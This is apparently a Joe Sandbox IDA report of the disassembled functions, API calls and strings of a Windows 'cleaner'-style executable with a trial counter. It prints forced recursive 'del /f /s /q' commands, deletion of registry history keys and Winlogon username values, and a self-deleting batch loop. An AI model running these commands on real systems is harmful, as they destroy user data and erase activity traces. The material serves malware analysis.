                                • Opcode ID: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                • Instruction ID: 6b44aab606d6ad69af96c057710d905d5c5d9310879aa73593c03cc9d95d0a52
                                • Opcode Fuzzy Hash: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                • Instruction Fuzzy Hash: E651C2751087419FC324EF25C895BDFB7A8AF88324F004A1FF45A432D2EB789519CB5A
                                APIs
                                • lstrcpyA.KERNEL32(00000800,LOC), ref: 0045F837
                                • LoadLibraryA.KERNEL32(?), ref: 0045F86A
                                • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0045F87A
                                Strings
                                Similarity
                                • API ID: InfoLibraryLoadLocalelstrcpy
                                • String ID: LOC
                                • API String ID: 864663389-519433814
                                • Opcode ID: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                • Instruction ID: ffcff24ee2f8decf076d347500f601e65b7776f307dd8f414f4772e04c55416e
                                • Opcode Fuzzy Hash: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                • Instruction Fuzzy Hash: 3F01A771500208ABDF14BB60EC09ADA37ACAB04365F408577FD19D6191E778DE4C8E9A
                                APIs
                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA10
                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA40
                                Similarity
                                • API ID: AdaptersInfo
                                • String ID:
                                • API String ID: 3177971545-0
                                • Opcode ID: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                • Instruction ID: 4f22e88a5df2136267b61b20a62ceb5ab55facc037de5985a683b6d03b984736
                                • Opcode Fuzzy Hash: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                • Instruction Fuzzy Hash: 05F0AFF1A00311EBE7149F15D805B17B7E8EB84705F00892EF889CB241E378DD48CB91
                                APIs
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                • Instruction ID: 2afed94fbf52a9488442a8020d80419d6e69f24e400d4a6813f348e17fbd4380
                                • Opcode Fuzzy Hash: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                • Instruction Fuzzy Hash: 9AE17B70500215EBDB15DF15C885ABE77B9EF08316F10851AFC09AA293CB3DEE09DB69
                                APIs
                                  • Part of subcall function 00404F00: _rand.LIBCMT ref: 00405041
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 00405836
                                • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00405848
                                • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00405859
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit,00000000,00000000), ref: 00405888
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 0040589A
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.gid && exit,00000000,00000000), ref: 004058B6
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058C8
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.log & exit,00000000,00000000), ref: 004058E4
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058F6
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.chk & exit,00000000,00000000), ref: 00405912
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405924
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit,00000000,00000000), ref: 0040594D
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), ref: 00405959
                                  • Part of subcall function 00405630: SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                  • Part of subcall function 00405630: SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,DefaultUserName), ref: 00405971
                                • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,AltDefaultUserName), ref: 00405986
                                • SHDeleteValueA.SHLWAPI(80000002,Software\Microsoft\Windows\CurrentVersion\Winlogon,DefaultUserName), ref: 0040599B
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU), ref: 004059AB
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU), ref: 004059B7
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU), ref: 004059C3
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU), ref: 004059CF
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU), ref: 004059DB
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004059ED
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\prefetch\*.* & exit,00000000,00000000), ref: 00405A0D
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A1F
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\recycled\*.* & exit,00000000,00000000), ref: 00405A3F
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A51
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit,00000000,00000000), ref: 00405A71
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A91
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit,00000000,00000000), ref: 00405AB5
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\TypedURLs), ref: 00405AC8
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\IntelliForms), ref: 00405ADB
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\RAS Autodial\Addresses), ref: 00405AE7
                                • SHEmptyRecycleBinA.SHELL32(00000000,00000000,00000007), ref: 00405AF6
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B21
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\$NtUninstal*.* & exit,00000000,00000000), ref: 00405B41
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B53
                                  • Part of subcall function 00459905: ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU, xrefs: 004059A1
                                • /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit, xrefs: 00405AA4
                                • Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 00405ABE
                                • Software\Microsoft\Internet Explorer\IntelliForms, xrefs: 00405AD1
                                • They have been cleaned successfully!, xrefs: 00405B69
                                • /k del /f /s /q %windir%\$NtUninstal*.* & exit, xrefs: 00405B30
                                • Software\Microsoft\Windows\CurrentVersion\Winlogon, xrefs: 00405991
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU, xrefs: 004059AD
                                • Software\Microsoft\RAS Autodial\Addresses, xrefs: 00405ADD
                                • cmd.exe, xrefs: 0040587C, 004058AA, 004058D8, 00405906, 00405941, 00405A01, 00405A33, 00405A65, 00405AA9, 00405B35
                                • /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit, xrefs: 00405A60
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU, xrefs: 004059B9
                                • /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit, xrefs: 0040593C
                                • /k del /f /s /q %systemdrive%\*.log & exit, xrefs: 004058D3
                                • AltDefaultUserName, xrefs: 00405977
                                • Information, xrefs: 00405B64
                                • /k del /f /s /q %windir%\prefetch\*.* & exit, xrefs: 004059FC
                                • /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit, xrefs: 00405877
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU, xrefs: 004059C5
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, xrefs: 0040594F
                                • open, xrefs: 00405881, 004058AF, 004058DD, 0040590B, 00405946, 00405A06, 00405A38, 00405A6A, 00405AAE, 00405B3A
                                • /k del /f /s /q %systemdrive%\*.chk & exit, xrefs: 00405901
                                • Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00405967, 0040597C
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU, xrefs: 004059D1
                                • /k del /f /s /q %systemdrive%\*.gid && exit, xrefs: 004058A5
                                • DefaultUserName, xrefs: 00405962, 0040598C
                                • /k del /f /s /q %systemdrive%\recycled\*.* & exit, xrefs: 00405A2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$DeleteSend$ExecuteShell$Value$EmptyFolderH_prologPathRecycleShowSpecialWindow_rand
                                • String ID: /k del /f /s /q %systemdrive%\*.chk & exit$/k del /f /s /q %systemdrive%\*.gid && exit$/k del /f /s /q %systemdrive%\*.log & exit$/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit$/k del /f /s /q %systemdrive%\recycled\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit$/k del /f /s /q %windir%\$NtUninstal*.* & exit$/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit$/k del /f /s /q %windir%\prefetch\*.* & exit$AltDefaultUserName$DefaultUserName$Information$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU$Software\Microsoft\Internet Explorer\IntelliForms$Software\Microsoft\Internet Explorer\TypedURLs$Software\Microsoft\RAS Autodial\Addresses$Software\Microsoft\Windows NT\CurrentVersion\Winlogon$Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU$Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU$Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU$Software\Microsoft\Windows\CurrentVersion\Winlogon$They have been cleaned successfully!$cmd.exe$open
                                • API String ID: 608165374-3242249910
                                • Opcode ID: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                • Instruction ID: 7915b94816bc076585abd770ead6f12c8ee0623fdfc370f13a234b32de4c556b
                                • Opcode Fuzzy Hash: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                • Instruction Fuzzy Hash: 4E914B703C0B00BAF6207B619C47F6B7294EB54F06F31492EB75A7A1C1E9F878458A5E
                                APIs
                                • __time64.LIBCMT ref: 00402EB9
                                  • Part of subcall function 00446DDD: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00402EBE,00000000), ref: 00446DE6
                                  • Part of subcall function 00446DDD: __aulldiv.LIBCMT ref: 00446E06
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F6D
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F9D
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402FAF
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 4.0), ref: 00402FC4
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 5.0), ref: 00402FD9
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 6.0), ref: 00402FEE
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 7.0), ref: 00403003
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 8.0), ref: 00403018
                                • RegOpenKeyExA.KERNEL32 ref: 00403046
                                • RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 004030E7
                                • RegCloseKey.KERNEL32(?,80000002,?,00000000,00020019,?,SOFTWARE\Microsoft\Internet Explorer), ref: 00403124
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00403166
                                • SendMessageA.USER32(?,0000014E,00000001,00000000), ref: 00403193
                                • SendMessageA.USER32(?,0000014E,00000002,00000000), ref: 004031C0
                                • SendMessageA.USER32(?,0000014E,00000003,00000000), ref: 004031ED
                                • SendMessageA.USER32(?,0000014E,00000004,00000000), ref: 0040321A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$OpenTime$CallbackCloseDispatcherErrorFileH_prologItemLastQuerySystemUserValue__aulldiv__time64
                                • String ID: Internet Explorer 4.0$Internet Explorer 5.0$Internet Explorer 6.0$Internet Explorer 7.0$Internet Explorer 8.0$ProductId$SOFTWARE\Microsoft\Internet Explorer$SOFTWARE\Microsoft\Internet Explorer\Registration$Version$d
                                • API String ID: 3070450969-2079231466
                                • Opcode ID: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                • Instruction ID: 12bbc5be726f8242eba0e1541a654c64904454683ae404ff7ef7c215fd5e6504
                                • Opcode Fuzzy Hash: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                • Instruction Fuzzy Hash: 94D1C670204741AFE310DB28CC86F9BB7A8BF84724F108A1DF6599B2D1DB78D505CB9A
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                • GetVersion.KERNEL32 ref: 0045F94B
                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0045F970
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0045F996
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F9E2
                                • ConvertDefaultLocale.KERNEL32(76F90A60), ref: 0045F9E8
                                • RegCloseKey.ADVAPI32(?), ref: 0045F9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                • API String ID: 780041395-483790700
                                • Opcode ID: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                • Instruction ID: 8cf04242b056ed2888822f3ee261883fc83cb0ac3b597c26b6eb5f4152f102d6
                                • Opcode Fuzzy Hash: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                • Instruction Fuzzy Hash: 715186B1E40219AEDF109FE5DC89BBFBBB8EB44315F10003BE905E3251D67C99448BA5
                                APIs
                                  • Part of subcall function 00455F5B: __EH_prolog.LIBCMT ref: 00455F60
                                  • Part of subcall function 00455F5B: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                  • Part of subcall function 00455F5B: LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                  • Part of subcall function 00455F5B: LockResource.KERNEL32(00000000), ref: 00455FB2
                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00439E9D
                                • CopyFileA.KERNEL32(?,?), ref: 00439EF1
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0043A20D
                                  • Part of subcall function 0045A8A7: __EH_prolog.LIBCMT ref: 0045A8AC
                                • DeleteFileA.KERNEL32(?), ref: 0043A26B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FileResource$H_prolog$CopyDeleteExecuteFindLoadLockModuleNameShell
                                • String ID: del $ exit$"$" goto loop$:loop$@echo off$There are %d times remain to try!$There are no times remain to try, you must sign to use it!$\system32\winbws.bat$\system32\winsys.ini$\system32\winsys.ini $\system32\winsys.ini "$copy $del "$if exist "$open$start " " "
                                • API String ID: 2304847132-3863200934
                                • Opcode ID: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                • Instruction ID: fcd660b851029791eff8e37d441e36e2141ad544d5897bee44c52de96331267e
                                • Opcode Fuzzy Hash: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                • Instruction Fuzzy Hash: 1CC17D750083819BC314EB66C856FDFBBE8AF95308F40491FF589521D2EBB89508CB6B
                                APIs
                                • _rand.LIBCMT ref: 00405041
                                • RegOpenKeyExA.KERNEL32 ref: 0040507B
                                • _strncpy.LIBCMT ref: 00405118
                                • RegSetValueExA.KERNEL32(?,ProductName,00000000,00000007,?,?), ref: 0040514A
                                • RegCloseKey.KERNEL32(?), ref: 00405155
                                • GetParent.USER32(?), ref: 0040515F
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CloseMessageOpenParentValue_rand_strncpy
                                • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 2000 Professional$Windows 3.1$Windows 95$Windows 98$Windows Me$Windows NT 3.5$Windows NT 4.0$Windows Server 2003$Windows Server 2008$Windows Sever 2000$Windows Vista$Windows XP Home Edition$Windows XP Professional
                                • API String ID: 259016058-1574738584
                                • Opcode ID: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                • Instruction ID: 6947d528358f3abf9f61610de5f967e2356a8112bdea7af398e2d87693c0fe26
                                • Opcode Fuzzy Hash: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
                                • Instruction Fuzzy Hash: 858192712087019BC314DF28D996F5BB3A4EFC4719F104A1EF4966B2D2DA78A80DCB67
                                APIs
                                • GetSystemMenu.USER32(?,00000000), ref: 0043AEE8
                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 0043AF51
                                • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 0043AF5C
                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 0043AF9C
                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 0043AFAD
                                • GetVersionExA.KERNEL32 ref: 0043B067
                                • SendMessageA.USER32(?,00001309,00000000,00000000), ref: 0043B147
                                • GetClientRect.USER32(?,?), ref: 0043B1E6
                                  • Part of subcall function 004021B0: FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                  • Part of subcall function 00459A51: SetWindowPos.USER32(?,000000FF,?,?,?,?,8rE,?,00457238,00000000,?,?,000000FF,000000FF,00000015), ref: 00459A77
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MenuMessageSend$Append$ClientFindRectResourceSystemVersionWindow
                                • String ID: (TRIAL)$Disk$MAC Addr$Name$OS:WIN2000$OS:WIN95$OS:WIN98$OS:WINNT$System1$System2$Unknown OS!!
                                • API String ID: 2761810206-2538934281
                                • Opcode ID: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                • Instruction ID: 28d43a913e9cc64de2e3d69b6c2acafb16c2cec924d16276a36815c0c13835ca
                                • Opcode Fuzzy Hash: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
                                • Instruction Fuzzy Hash: 55E1AB70344701ABD714CB24CC99F6BB7A5BB88704F148A1DF6999B3C2DB74E806CB99
                                APIs
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 004588E9
                                • GetClassLongA.USER32(?,000000E6), ref: 0045892E
                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,Function_0005EC43), ref: 0045895A
                                • lstrcmpiA.KERNEL32(?,ime), ref: 00458969
                                • SetWindowLongA.USER32(?,000000FC,Function_00057E4D), ref: 004589A3
                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 00458AA7
                                • UnhookWindowsHookEx.USER32(?), ref: 00458AB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
